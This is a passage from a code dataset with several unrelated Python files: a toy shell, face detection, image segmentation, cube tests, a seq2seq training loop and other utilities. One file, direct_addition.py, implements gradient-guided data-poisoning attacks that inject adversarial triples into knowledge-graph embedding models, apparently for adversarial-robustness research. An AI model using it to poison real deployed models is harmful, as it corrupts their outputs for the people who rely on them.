s1.__len__() == 2):\n shell.cd(s1)\n \n else:\n print(s+\": command not found\")\n\n elif s1[0] == 'cp':\n \n if( s1.__len__() == 3):\n shell.cp(s1[1],s1[2])\n \n else:\n print(s+\": command not found\")\n\n elif s1[0] =='mv':\n \n if( s1.__len__() == 3):\n shell.mv(s1[1],s1[2])\n else:\n print(s+\": command not found\")\n\n elif s1[0] == 'rm':\n \n if s1.__len__() == 2: \n shell.rm(file = s1[1])\n elif( s1.__len__() == 3):\n shell.rm(s1[1],s1[2])\n else:\n print(s+\": command not found\")\n\n elif s1[0] == 'mkdir':\n \n if s1.__len__() == 2:\n shell.mkdir(s1[1])\n else: \n 'mkdir: missing operand\\nTry \"help\" for more information.'\n \n elif s1[0] == 'rename':\n if s1.__len__() == 3:\n shell.rename(s1[1],s1[2])\n else: \n 'rename error: Try \"help\" for more information.'\n\n elif s1[0] == 'cat':\n if s1.__len__() == 2:\n print(shell.cat(s1[1]))\n else: \n 'cat error: Try \"help\" for more information.'\n \n elif s1[0] == './':\n if s1.__len__() == 2:\n shell.exec(s1[1])\n \n elif s1[0] == 'grep':\n if s1.__len__() == 3:\n print(shell.grep(s1[1],s1[2]))\n\n else:\n print(s+\": command not found\")\n \n \n \n \n\n","repo_name":"RodrigoPrintes/SO","sub_path":"Shell/Shell.py","file_name":"Shell.py","file_ext":"py","file_size_in_byte":6988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73273700809","text":"# proposed by \"Data Poisoning Attack against Knowledge Graph Embedding\"\n# we use the Direct Attack in the paper\n# we want to find the triple (h', r', t') = argmax(f(h,r',t') - f(h+dh, r', t'))\n# CUDA_VISIBLE_DEVICES=0 python codes/noise_generator/direct_addition.py --init_checkpoint ./models/ComplEx_FB15k-237_baseline/\n\nimport itertools\n\nimport torch\n\nfrom collections import defaultdict\nfrom random_noise import *\nimport torch.autograd as autograd\n\n\nclass DirectAddition(GlobalRandomNoiseAttacker):\n def __init__(self, args):\n super(DirectAddition, self).__init__(args)\n self.score_func = lambda s1, s2: args.lambda1 * s1 - args.lambda2 * s2\n self.name = \"direct\"\n\n self.true_rel_head, self.true_rel_tail = defaultdict(set), defaultdict(set)\n for triple in self.input_data.all_true_triples:\n self.add_true_triple(triple)\n \n def add_true_triple(self, triple):\n h, r, t = triple\n self.true_rel_tail[h].add((r, t))\n self.true_rel_head[t].add((r, h))\n\n def get_noise_for_head(self, test_triple, mode=\"head-batch\"):\n args = self.args\n h, r, t = test_triple\n true_cand = self.true_rel_tail[h] if mode == \"head-batch\" else self.true_rel_head[t]\n s = time.time()\n cand_r_list = random.choices(self.all_relations, k=args.num_cand)\n cand_e_list = random.choices(self.all_entities, k=args.num_cand)\n cand_r_e_list = list(set(zip(cand_r_list, cand_e_list)).difference(true_cand))\n cand_r_list, cand_e_list = zip(*cand_r_e_list)\n cand_r_list, cand_e_list = list(cand_r_list), list(cand_e_list)\n args.num_cand = len(cand_r_list)\n\n embed_h = self.kge_model.entity_embedding[h]\n embed_r = self.kge_model.relation_embedding[r]\n embed_t = self.kge_model.entity_embedding[t]\n score = self.kge_model.score_embedding(embed_h, embed_r, embed_t)\n perturbed_embed_h, perturbed_embed_t = None, None\n if mode == \"head-batch\":\n embed_h_grad = autograd.grad(score, embed_h)[0]\n perturbed_embed_h = embed_h - args.epsilon * embed_h_grad\n elif mode == \"tail-batch\":\n embed_t_grad = autograd.grad(score, embed_t)[0]\n perturbed_embed_t = embed_t - args.epsilon * embed_t_grad\n\n b_begin = 0\n cand_scores = []\n with torch.no_grad():\n while b_begin < args.num_cand:\n b_cand_r = cand_r_list[b_begin: b_begin + args.num_cand]\n b_cand_e = cand_e_list[b_begin: b_begin + args.num_cand]\n b_begin += args.num_cand\n\n embed_cand_r = self.kge_model.relation_embedding[b_cand_r]\n embed_cand_e = self.kge_model.entity_embedding[b_cand_e]\n s1, s2 = None, None\n if mode == \"head-batch\":\n s1 = self.kge_model.score_embedding(perturbed_embed_h, embed_cand_r, embed_cand_e, mode=mode)\n s2 = self.kge_model.score_embedding(embed_h, embed_cand_r, embed_cand_e, mode=mode)\n elif mode == \"tail-batch\":\n s1 = self.kge_model.score_embedding(embed_cand_e, embed_cand_r, perturbed_embed_t, mode=mode)\n s2 = self.kge_model.score_embedding(embed_cand_e, embed_cand_r, embed_t, mode=mode)\n score = self.score_func(s1, s2)\n score = score.detach().cpu().numpy().tolist()\n cand_scores += score\n cand_scores = np.array(cand_scores)\n idx = np.argmax(cand_scores)\n score = cand_scores[idx]\n if mode == \"head-batch\":\n return (h, cand_r_list[idx], cand_e_list[idx]), score.item()\n return (cand_e_list[idx], cand_r_list[idx], t), score.item()\n\n def get_noise_triples(self):\n noise_triples, args = self.noise_triples, self.args\n args.num_cand = np.math.ceil((args.nentity*args.nrelation)*args.corruption_factor / 100)\n all_true_triples = set(self.input_data.all_true_triples)\n for i in range(len(self.target_triples)):\n sys.stdout.write(\"%d in %d\\r\" % (i, len(self.target_triples)))\n sys.stdout.flush()\n target_triple = self.target_triples[i]\n noise_triple_h, score_h = self.get_noise_for_head(target_triple, mode=\"head-batch\")\n noise_triple_t, score_t = self.get_noise_for_head(target_triple, mode=\"tail-batch\")\n if score_h > score_t:\n noise_triples.add(noise_triple_h)\n self.add_true_triple(noise_triple_h)\n else:\n noise_triples.add(noise_triple_t)\n self.add_true_triple(noise_triple_t)\n return list(noise_triples)\n\nclass CentralDiffAddition(DirectAddition):\n def __init__(self, args):\n super(CentralDiffAddition, self).__init__(args)\n self.name = \"central_diff\"\n self.args.epsilon = self.args.learning_rate\n\n def get_noise_for_head(self, test_triple, mode=\"head-batch\"):\n args = self.args\n h, r, t = test_triple\n true_cand = self.true_rel_tail[h] if mode == \"head-batch\" else self.true_rel_head[t]\n cand_r_list = random.choices(self.all_relations, k=args.num_cand)\n cand_e_list = random.choices(self.all_entities, k=args.num_cand)\n cand_r_e_list = list(set(zip(cand_r_list, cand_e_list)).difference(true_cand))\n cand_r_list, cand_e_list = zip(*cand_r_e_list)\n cand_r_list, cand_e_list = list(cand_r_list), list(cand_e_list)\n args.num_cand = len(cand_r_list)\n\n embed_h = self.kge_model.entity_embedding[h]\n embed_r = self.kge_model.relation_embedding[r]\n embed_t = self.kge_model.entity_embedding[t]\n score = self.kge_model.score_embedding(embed_h, embed_r, embed_t)\n perturbed_embed_e, enforced_embed_e = None, None\n ########## begin difference ############\n if mode == \"head-batch\":\n embed_h_grad = autograd.grad(score, embed_h)[0]\n perturbed_embed_e = embed_h - args.epsilon * embed_h_grad\n enforced_embed_e = embed_h + args.epsilon * embed_h_grad\n elif mode == \"tail-batch\":\n embed_t_grad = autograd.grad(score, embed_t)[0]\n perturbed_embed_e = embed_t - args.epsilon * embed_t_grad\n enforced_embed_e = embed_t + args.epsilon * embed_t_grad\n ########## end difference ############\n\n b_begin = 0\n cand_scores = []\n while b_begin < args.num_cand:\n b_cand_r = cand_r_list[b_begin: b_begin + args.num_cand]\n b_cand_e = cand_e_list[b_begin: b_begin + args.num_cand]\n b_begin += args.num_cand\n\n embed_cand_r = self.kge_model.relation_embedding[b_cand_r]\n embed_cand_e = self.kge_model.entity_embedding[b_cand_e]\n s1, s2 = None, None\n ########## begin difference ############\n if mode == \"head-batch\":\n s1 = self.kge_model.score_embedding(perturbed_embed_e, embed_cand_r, embed_cand_e, mode=mode)\n s2 = self.kge_model.score_embedding(enforced_embed_e, embed_cand_r, embed_cand_e, mode=mode)\n elif mode == \"tail-batch\":\n s1 = self.kge_model.score_embedding(embed_cand_e, embed_cand_r, perturbed_embed_e, mode=mode)\n s2 = self.kge_model.score_embedding(embed_cand_e, embed_cand_r, enforced_embed_e, mode=mode)\n ########## end difference ############\n score = self.score_func(s1, s2)\n score = score.detach().cpu().numpy().tolist()\n cand_scores += score\n cand_scores = np.array(cand_scores)\n idx = np.argmax(cand_scores)\n score = cand_scores[idx]\n if mode == \"head-batch\":\n return (h, cand_r_list[idx], cand_e_list[idx]), score.item()\n return (cand_e_list[idx], cand_r_list[idx], t), score.item()\n\nclass DirectRelAddition(DirectAddition):\n def __init__(self, args):\n super(DirectRelAddition, self).__init__(args)\n self.score_func = lambda s1, s2: args.lambda1 * s1 - args.lambda2 * s2\n self.name = \"direct_rel\"\n self.true_head_tail = {}\n for h, r, t in self.input_data.all_true_triples:\n if r not in self.true_head_tail:\n self.true_head_tail[r] = set()\n self.true_head_tail[r].add((h, t))\n\n def get_noise_for_head(self, test_triple, mode=\"head-batch\"):\n if mode == \"tail-batch\":\n return test_triple, -1e9\n args = self.args\n h, r, t = test_triple\n s = time.time()\n true_cand = self.true_head_tail[r]\n cand_h_list = random.choices(self.all_entities, k=args.num_cand)\n cand_t_list = random.choices(self.all_entities, k=args.num_cand)\n cand_h_t_list = list(set(zip(cand_h_list, cand_t_list)).difference(true_cand))\n cand_h_list, cand_t_list = zip(*cand_h_t_list)\n cand_h_list, cand_t_list = list(cand_h_list), list(cand_t_list)\n args.num_cand = len(cand_h_list)\n e1 = time.time()\n\n embed_h = self.kge_model.entity_embedding[h]\n embed_r = self.kge_model.relation_embedding[r]\n embed_t = self.kge_model.entity_embedding[t]\n score = self.kge_model.score_embedding(embed_h, embed_r, embed_t)\n embed_r_grad = autograd.grad(score, embed_r)[0]\n perturbed_embed_r = embed_r - args.epsilon * embed_r_grad\n e2 = time.time()\n\n b_begin = 0\n cand_scores = []\n with torch.no_grad():\n while b_begin < args.num_cand:\n b_cand_h = cand_h_list[b_begin: b_begin + args.num_cand]\n b_cand_t = cand_t_list[b_begin: b_begin + args.num_cand]\n b_begin += args.num_cand\n\n embed_cand_h = self.kge_model.entity_embedding[b_cand_h]\n embed_cand_t = self.kge_model.entity_embedding[b_cand_t]\n s1 = self.kge_model.score_embedding(embed_cand_h, perturbed_embed_r, embed_cand_t, mode=mode)\n s2 = self.kge_model.score_embedding(embed_cand_h, embed_r, embed_cand_t, mode=mode)\n score = self.score_func(s1, s2)\n score = score.detach().cpu().numpy().tolist()\n cand_scores += score\n cand_scores = np.array(cand_scores)\n idx = np.argmax(cand_scores)\n score = cand_scores[idx]\n e3 = time.time()\n self.true_head_tail[r].add((cand_h_list[idx], cand_t_list[idx]))\n return (cand_h_list[idx], r, cand_t_list[idx]), score.item()\n\nif __name__ == \"__main__\":\n args = get_noise_args()\n override_config(args)\n \n suffix = \"\"\n if args.corruption_factor != 5:\n suffix = \"_%d\" % args.corruption_factor\n generator = DirectAddition(args)\n generator.generate(\"direct\" + suffix)\n \n generator = CentralDiffAddition(args)\n generator.generate(\"central_diff\" + suffix)\n \n generator = DirectRelAddition(args)\n generator.generate(\"direct_rel\")","repo_name":"zyksir/AdversarialAttackOnKGE","sub_path":"codes/noise_generator/direct_addition.py","file_name":"direct_addition.py","file_ext":"py","file_size_in_byte":10916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"19787266098","text":"import cv2\r\n\r\nface_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_alt2.xml')\r\n\r\ndef captureFace(img_original):\r\n frame = img_original\r\n img = frame\r\n face_area_image = img\r\n faces = face_cascade.detectMultiScale(frame, 1.1, minNeighbors = 3,minSize=(20, 20))\r\n SAFE_MARGIN_W = 0\r\n SAFE_MARGIN_H = 0\r\n\r\n for (x, y, w, h) in faces:\r\n # 画出人脸框,蓝色,画笔宽度微\r\n img = cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2)\r\n # 框选出人脸区域,在人脸区域而不是全图中进行人眼检测,节省计算资源\r\n face_area = img[y:y + h, x:x + w]\r\n face_area_image = frame[y - int(h * SAFE_MARGIN_H):y + int(h * (SAFE_MARGIN_H + 1)),\r\n x - int(w * SAFE_MARGIN_W):x + int(w * (SAFE_MARGIN_W + 1))]\r\n\r\n # cv2.imshow('frameFace', face_area_image)\r\n # cv2.imshow('frame2Q', img)\r\n # cv2.waitKey(0)\r\n # cv2.destroyAllWindows()\r\n return face_area_image,len(faces),img\r\n\r\n#\r\n# img_path='89605_1958-07-06_2014.jpg'\r\n# iaaa=cv2.imread(img_path, 0)\r\n# captureFace(iaaa)\r\n\r\n","repo_name":"VincentAC-stack/Gender-Prediction","sub_path":"capture_Face.py","file_name":"capture_Face.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5836872483","text":"import os\n\ndef walk(dirname):\n\tfor name in os.listdir(dirname):\n\t\tpath = os.path.join(dirname,name)\n\n\t\tif os.path.isfile(path):\n\t\t\tprint(path)\n\t\telse:\n\t\t\twalk(path)\n\ncwd = os.getcwd()\n\nabs_path = os.path.abspath('aainw.txt')\nprint(abs_path)\nprint(os.path.exists('emma.txt'))\nprint(os.path.isdir('C:\\\\Users\\\\apost'))\nprint(os.path.isfile('output.txt'))\n#print(os.listdir(cwd))\nwalk('C:\\\\Users\\\\apost\\\\Documents\\\\_Coding')\nprint('---')\nfor root, dirs, files in os.walk('C:\\\\Users\\\\apost\\\\Documents\\\\_Coding'):\n for name in files:\n print(os.path.join(root, name))\n for name in dirs:\n print(os.path.join(root, name))\n\nfout = open('output.txt', 'w')\n\nline1 = \"This is line one.\"\nline2 = \"The is the second line.\"\nfout.write(line1)\nfout.write(line2)\n\nfout.close()","repo_name":"dominicwllmsn/thinkpython","sub_path":"exercises/chapter14/test142.py","file_name":"test142.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70270020488","text":"import numpy\n\nfrom catii import ccube, iindex\nfrom catii.ffuncs import ffunc_count, ffunc_sum\n\nfrom . import arr_eq, compare_ccube_to_xcube\n\n\nclass TestCubeCreation:\n def test_direct_construction(self):\n idx1 = iindex({(1,): [0, 2, 7]}, 0, (8,))\n idx2 = iindex({(1,): [0, 2, 5]}, 0, (8,))\n cube = ccube([idx1, idx2])\n\n assert cube.dims == [idx1, idx2]\n assert cube.intersection_data_points == 0\n assert cube.shape == (2, 2)\n\n def test_explicit_shape_arg(self):\n idx1 = iindex({(1,): [0, 2, 7]}, 0, (8,))\n idx2 = iindex({(1,): [0, 2, 5]}, 0, (8,))\n\n cube = ccube([idx1, idx2], interacting_shape=(2, 2))\n assert cube.dims == [idx1, idx2]\n assert cube.shape == (2, 2)\n\n cube = ccube([idx1, idx2], interacting_shape=(4, 3))\n assert cube.dims == [idx1, idx2]\n assert cube.shape == (4, 3)\n\n def test_implicit_shape_arg(self):\n # Construct indexes where the common value is the highest value,\n # to make sure we are not only looking at index values to infer shape.\n idx1 = iindex({(0,): [0, 2, 7]}, 2, (8,))\n idx2 = iindex({(0,): [0, 2, 5]}, 3, (8,))\n cube = ccube([idx1, idx2])\n\n assert cube.dims == [idx1, idx2]\n assert cube.shape == (3, 4)\n\n\nclass TestCubeDimensions:\n def test_cube_1d_x_1d(self):\n with compare_ccube_to_xcube():\n idx1 = iindex({(1,): [0, 2, 7]}, 0, (8,))\n idx2 = iindex({(1,): [0, 2, 5]}, 0, (8,))\n cube = ccube([idx1, idx2])\n assert cube.count().tolist() == [[4, 1], [1, 2]]\n\n\nclass TestCubeProduct:\n def test_cube_product(self):\n idx1 = iindex({(1,): [0, 2, 7]}, 0, (8,))\n cube = ccube([idx1, idx1])\n result = list(cube.product())\n for subcube in result:\n for dim in subcube:\n dim[\"data\"] = {k: v.tolist() for k, v in dim[\"data\"].items()}\n assert result == [\n (\n {\"coords\": (), \"data\": {(1,): [0, 2, 7]}},\n {\"coords\": (), \"data\": {(1,): [0, 2, 7]}},\n )\n ]\n\n idx2 = iindex({(1, 0): [0, 2, 5], (1, 1): [3, 4]}, 0, (8, 2))\n cube = ccube([idx1, idx2])\n result = list(cube.product())\n for subcube in result:\n for dim in subcube:\n dim[\"data\"] = {\n k: v if isinstance(v, list) else v.tolist()\n for k, v in dim[\"data\"].items()\n }\n assert result == [\n (\n {\"coords\": (), \"data\": {(1,): [0, 2, 7]}},\n {\"coords\": (0,), \"data\": {(1,): [0, 2, 5]}},\n ),\n (\n {\"coords\": (), \"data\": {(1,): [0, 2, 7]}},\n {\"coords\": (1,), \"data\": {(1,): [3, 4]}},\n ),\n ]\n\n\nclass TestCubeCalculate:\n def test_cube_calculate(self):\n # [1, 0, 1, 0, 0, 0, 0, 1]\n idx1 = iindex({(1,): [0, 2, 7]}, 0, (8,))\n cube = ccube([idx1, idx1])\n counts = cube.calculate([ffunc_count()])[0]\n assert arr_eq(counts, [[5, float(\"nan\")], [float(\"nan\"), 3]])\n\n # 0: [1, 0, 1, 0, 0, 1, 0, 0],\n # 1: [0, 0, 0, 1, 1, 0, 0, 0]\n idx2 = iindex({(1, 0): [0, 2, 5], (1, 1): [3, 4]}, 0, (8, 2))\n cube = ccube([idx1, idx2])\n counts = cube.calculate([ffunc_count()])[0]\n assert arr_eq(counts, [[[4, 1], [1, 2]], [[3, 2], [3, float(\"nan\")]]])\n\n fsum = ffunc_sum((numpy.arange(8)))\n counts, sums = cube.calculate([ffunc_count(), fsum])\n assert arr_eq(counts, [[[4, 1], [1, 2]], [[3, 2], [3, float(\"nan\")]]])\n assert arr_eq(sums, [[[14, 5], [7, 2]], [[12, 7], [9, float(\"nan\")]]])\n","repo_name":"Crunch-io/catii","sub_path":"tests/test_ccubes.py","file_name":"test_ccubes.py","file_ext":"py","file_size_in_byte":3692,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"72736739529","text":"from matplotlib import pyplot as plt\nimport cv2\nimport numpy as np\n\ntrain_num = 7202\nval_num = 522\n\ndef BW(total, set):\n\tfor i in range(total):\n\t\tpath = '/Users/huiwenyou/Desktop/hack/pics/cell_images/' + set + '/' + str(i+1) + '.jpg'\n\t\tpic = plt.imread(path)/255 # dividing by 255 to bring the pixel values between 0 and 1\n\t\t# plt.imshow(pic)\n\n\t\tpic_n = pic.reshape(pic.shape[0]*pic.shape[1], pic.shape[2])\n\t\t# print(pic_n.shape)\n\n\t\tfrom sklearn.cluster import KMeans\n\t\tkmeans = KMeans(n_clusters=2, random_state=0).fit(pic_n)\n\t\t# print(kmeans.labels_)\n\t\tpic2show = kmeans.cluster_centers_[kmeans.labels_]\n\t\t# np.histogram(pic2show)\n\t\t# plt.hist(pic2show[:, 0], bins='auto')\n\t\t# plt.show()\n\t\tflattened = pic2show.flatten()\n\t\tmean = (max(flattened) + min(flattened)) / 2\n\t\tfor r, each_row in enumerate(pic2show):\n\t\t\tfor c, col in enumerate(each_row):\n\t\t\t\tif col > mean:\n\t\t\t\t\tpic2show[r, c] = 1\n\t\t\t\telse:\n\t\t\t\t\tpic2show[r, c] = 0\n\n\t\tcluster_pic = pic2show.reshape(pic.shape[0], pic.shape[1], pic.shape[2])\n\t\tpath1 = '/Users/huiwenyou/Desktop/hack/pics/cell_images/' + set + '/BW/clean' + str(i + 1) + '.jpg'\n\t\tcv2.imwrite(path1, cluster_pic * 255)\n\t# print(\"done\")\n\ndef overlap(rect, rest):\n\tfor rect_each in rest:\n\t\t_x, _y, _w, _h = rect_each\n\t\tx, y, w, h = rect\n\t\tif x + w <= _x + _w and x > _x and y + h <= _y + _h and y >= _y:\n\t\t\t# inside\n\t\t\tprint(\"{} is inside {}\".format(rect, rect_each))\n\t\t\treturn True\n\treturn False\n\ndef segment(total_num):\n\t# segmentation version 2\n\tfor i in range(total_num):\n\t\tpath = '/Users/huiwenyou/Desktop/hack/pics/cell_images/' + set_name + '/BW/clean' + str(i+1) + '.jpg'\n\t\tsrc = cv2.imread(path, 1) # read input image 3 color\n\t\theight, width, channels = src.shape\n\t\tarea = height * width\n\n\t\tgray = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY) # convert to grayscale\n\t\tblur = cv2.blur(gray, (3, 3)) # blur the image\n\t\tret, thresh = cv2.threshold(blur, 127, 255, cv2.THRESH_BINARY)\n\n\t\tcontours,hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n\t\t# create hull array for convex hull points\n\t\thull = []\n\t\thull_vertices = []\n\n\t\trect = []\n\t\trect_vertices = []\n\n\t\tdrawing_rect = np.zeros((thresh.shape[0], thresh.shape[1], 3), np.uint8)\n\t\t# calculate points for each contour\n\t\tfor ci in range(len(contours)):\n\t\t\t# creating convex hull object for each contour\n\t\t\thull_vertices.append(cv2.convexHull(contours[ci], clockwise=True))\n\t\t\thull.append(cv2.convexHull(contours[ci], False))\n\t\t\tx, y, w, h = cv2.boundingRect(contours[ci])\n\t\t\trect.append([x, y, w, h])\n\n\t\tprint(area)\n\t\tfiltered_rect = []\n\t\tfor rect_info in rect:\n\t\t\tx, y, w, h = rect_info\n\t\t\tif w * h > 0.85 * area:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tfiltered_rect.append(rect_info)\n\n\t\tfiltered_rect_2 = []\n\t\tto_remove = []\n\t\tfor rect_info in filtered_rect:\n\t\t\t# points_4 = [(x, y), (x, y + w), (x + h, y + w), (x + h, y)]\n\t\t\trest = [can for can in filtered_rect if can != rect_info]\n\t\t\tis_inside = overlap(rect_info, rest)\n\t\t\tif is_inside:\n\t\t\t\tto_remove.append(rect_info)\n\n\t\t# print(filtered_rect)\n\t\tfiltered_rect_2 = [can for can in filtered_rect if can not in to_remove]\n\t\t# print(filtered_rect_2)\n\n\t\tif plot:\n\t\t\tfor each in filtered_rect_2:\n\t\t\t\tx, y, w, h = each\n\t\t\t\tcv2.rectangle(drawing_rect, (x, y), (x + w, y + h), (255, 0, 0), 1)\n\n\t\t# save splits - sort by column\n\t\timport operator, os\n\t\tfiltered_rect_2.sort(key=operator.itemgetter(1))\n\n\t\tprint(filtered_rect_2)\n\t\tfor idx, sorted_each in enumerate(filtered_rect_2):\n\t\t\tx, y, w, h = sorted_each\n\t\t\tcrop = src[y: y+h, x: x+w]\n\t\t\tout_dir = '/Users/huiwenyou/Desktop/hack/pics/cell_images/' + set_name + '/Split/f' + str(i+1) + '/'\n\t\t\tif not os.path.exists(out_dir):\n\t\t\t\tos.mkdir(out_dir)\n\t\t\tout_path = out_dir + str(i) + '_' + str(idx+1) + '.jpg'\n\t\t\tcv2.imwrite(out_path, crop)\n\t\t\t# crop.save(out_path, 'jpg')\n\n\t\tif plot:\n\t\t\tcv2.imshow(\"rect\", drawing_rect)\n\t\t\t# create an empty black image\n\t\t\tdrawing_hull = np.zeros((thresh.shape[0], thresh.shape[1], 3), np.uint8)\n\t\t\t# draw contours and hull points\n\t\t\tfor i in range(len(contours)):\n\t\t\t\tcolor_contours = (0, 255, 0) # green - color for contours\n\t\t\t\tcolor = (255, 0, 0) # blue - color for convex hull\n\t\t\t\t# draw ith contour\n\t\t\t\tcv2.drawContours(drawing_hull, contours, i, color_contours, 1, 8, hierarchy)\n\t\t\t\t# draw ith convex hull object\n\t\t\t\tcv2.drawContours(drawing_hull, hull, i, color, 1, 8)\n\t\t\tcv2.imshow(\"hull\", drawing_hull)\n\t\t\tcv2.waitKey()\n\t\t\tcv2.destroyAllWindows()\n\n\n\nplot = True\ntotal_num = train_num #val_num\nset_name = 'training_set' #'validation_set'\n\n# for BW\nBW(total_num, set_name)\n","repo_name":"HarveyYan/OCR2Text","sub_path":"kmean.py","file_name":"kmean.py","file_ext":"py","file_size_in_byte":4505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41937032938","text":"def trainIters(encoder, decoder, n_iters, batch_size=1, print_every=1000, save_every=1000, plot_every=100,\n learning_rate=0.0001):\n start = time.time()\n plot_losses = []\n val_losses = []\n print_loss_total = 0 # Reset every print_every\n plot_loss_total = 0 # Reset every plot_every\n\n encoder_optimizer = optim.SGD(encoder.parameters(), lr=learning_rate)\n decoder_optimizer = optim.SGD(decoder.parameters(), lr=learning_rate)\n # training_pairs = [sent_pairs[i] for i in range(n_iters)]\n training_pairs = [random.sample(sent_pairs, batch_size) for i in range(n_iters)]\n\n # training_pairs = [tensorsFromPair(random.choice(pairs)) for i in range(n_iters)]\n criterion = nn.NLLLoss()\n\n patience = 10 # mod Pier\n\n for iter in range(1, n_iters + 1):\n training_pair = training_pairs[iter - 1]\n # print(\"################################\")\n # print(training_pair)\n input_tensor = training_pair[0][0]\n target_tensor = training_pair[0][1]\n # print(\"printing tensors for training...\")\n # print(input_tensor)\n # print(target_tensor)\n\n loss = get_train_loss(input_tensor, target_tensor, encoder, decoder, encoder_optimizer, decoder_optimizer,\n criterion)\n print_loss_total += loss\n plot_loss_total += loss\n\n stopping_delta = 0.01 # if improvement is not more than this amount after n tries, exit the loop\n prev_val_loss = 999\n\n if iter % print_every == 0:\n print_loss_avg = print_loss_total / print_every\n print_loss_total = 0\n print('Training loss: %s (%d %d%%) %.4f' % (timeSince(start, iter / n_iters),\n iter, iter / n_iters * 100, print_loss_avg))\n\n total_val_loss = 0\n total_val_pairs = len(val_sent_tensor_pairs)\n\n for itr in range(0, len(val_sent_tensor_pairs)):\n val_input_tensor = val_sent_tensor_pairs[itr][0]\n val_target_tensor = val_sent_tensor_pairs[itr][1]\n # print(\"Validation record: {0}\".format(itr))\n # print(val_sent_pairs[itr])\n val_loss = get_validation_loss(val_input_tensor, val_target_tensor, encoder, decoder, criterion)\n total_val_loss += val_loss\n\n avg_val_loss = total_val_loss / total_val_pairs\n val_losses.append(avg_val_loss)\n print('Validation loss: %s (%d %d%%) %.4f' % (timeSince(start, iter / n_iters),\n iter, iter / n_iters * 100, avg_val_loss))\n\n # mod P_ier\n if abs(avg_val_loss - prev_val_loss) > stopping_delta:\n print(f\"No improvement in validation loss, losing patience, saving model : {patience}\")\n encoder_save_path = '%s/%s-%d.pth' % (SAVE_PATH, 'encoder', iter)\n print('save encoder weights to ', encoder_save_path)\n torch.save(encoder.state_dict(), encoder_save_path)\n decoder_save_path = '%s/%s-%d.pth' % (SAVE_PATH, 'decoder', iter)\n print('save decoder weights to ', decoder_save_path)\n torch.save(decoder.state_dict(), decoder_save_path)\n\n patience -= 1\n\n if patience == 0: # break out of training\n break\n\n prev_val_loss = avg_val_loss\n # end mod Pier\n\n print(\"##########################################################\")\n\n if iter % plot_every == 0:\n plot_loss_avg = plot_loss_total / plot_every\n plot_losses.append(plot_loss_avg)\n plot_loss_total = 0\n\n # # save trained encoder and decoder\n # if iter % save_every == 0:\n # encoder_save_path = '%s/%s-%d.pth' % (SAVE_PATH, 'encoder', iter)\n # print('save encoder weights to ', encoder_save_path)\n # torch.save(encoder.state_dict(), encoder_save_path)\n # decoder_save_path = '%s/%s-%d.pth' % (SAVE_PATH, 'decoder', iter)\n # print('save decoder weights to ', decoder_save_path)\n # torch.save(decoder.state_dict(), decoder_save_path)\n\n showPlot(plot_losses, 'train_plot.png')\n showPlot(val_losses, 'validation_plot.png')\n\n return plot_losses, val_losses","repo_name":"lppier/Seq2Seq_Eng2Indo-Translation","sub_path":"writing_stopping_criteria.py","file_name":"writing_stopping_criteria.py","file_ext":"py","file_size_in_byte":4351,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"} +{"seq_id":"70061108487","text":"from utils.primes import get_primes\n\n\ndef get_min_phi_ratio_perm(max_n: int) -> int:\n \"\"\"\n Get the values of 1 < n < 10^7 such that n and phi(n) are permutations and\n n/phi(n) is minimum.\n\n This is achieved when n = p1 * p2 for primes p1 and p2.\n Also, phi(p1 * p2) = (p1 - 1)(p2 - 1)\n \"\"\"\n # Obviously you won't know the search range 10^3 < p < 10^4 beforehand\n bounded_primes = [p for p in get_primes(max_n) if 10**3 < p < 10**4]\n len_primes = len(bounded_primes)\n\n sol_n = 0\n min_ratio = float(\"inf\")\n\n for i, p in enumerate(bounded_primes):\n for j in range(i + 1, len_primes):\n q = bounded_primes[j]\n n = p * q\n if n > 10000000:\n break\n phi = (p - 1) * (q - 1)\n ratio = n / phi\n if ratio < min_ratio and sorted(str(n)) == sorted(str(phi)):\n min_ratio = ratio\n sol_n = n\n return sol_n\n","repo_name":"JohN100x1/Project-Euler","sub_path":"src/solutions/p070.py","file_name":"p070.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2490719421","text":"import unittest\nfrom tools import get_report_path\nfrom datetime import datetime\nfrom decimal import Decimal\nfrom nuntiare.report import Report\nimport nuntiare.definition.functions as fn\n\n\nclass AggregateTest(unittest.TestCase):\n def test_aggregate(self):\n '''\n Test a simple table (Tablix with just a TablixBody)\n and aggregates Count, RunningValue, RowNumber, and\n Sum in diferent contexts.\n Test Grouping and sorting too.\n '''\n report = Report(get_report_path('northwind_orders.xml'))\n\n con_file_info = open(\"db_test_connection_northwind\", \"r\")\n conn_str = con_file_info.readline()\n con_file_info.close()\n\n parameters = {\n 'conn_string': conn_str,\n 'query_limit': 100,\n }\n report.run(parameters)\n\n grid = report.result.body.items.item_list[0].grid_body\n\n self.assertEqual(self._cell_value(grid, 0, 2), 'Product')\n self.assertEqual(self._cell_value(grid, 0, 11), 'Running Avg')\n\n # Austria\n self._ckeck_country_header(\n grid, 1, 7, 1, 'Austria', 305.00,\n 4483.4, 994.72, 3488.68, 7, 3488.68, 498.38)\n self._ckeck_customer_header(\n grid, 2, 1, 'Ernst Handel', 305.00,\n 4483.4, 994.72, 3488.68, 7, 3488.68, 498.38)\n self._ckeck_order_header(grid, 3, 1, 10258)\n self._ckeck_order_line(\n grid, 4, 1, 'Chang', 50.0,\n 15.2, 760.0, 0.2, 152.0, 608.0, 1, 608.0, 608.0, 1)\n 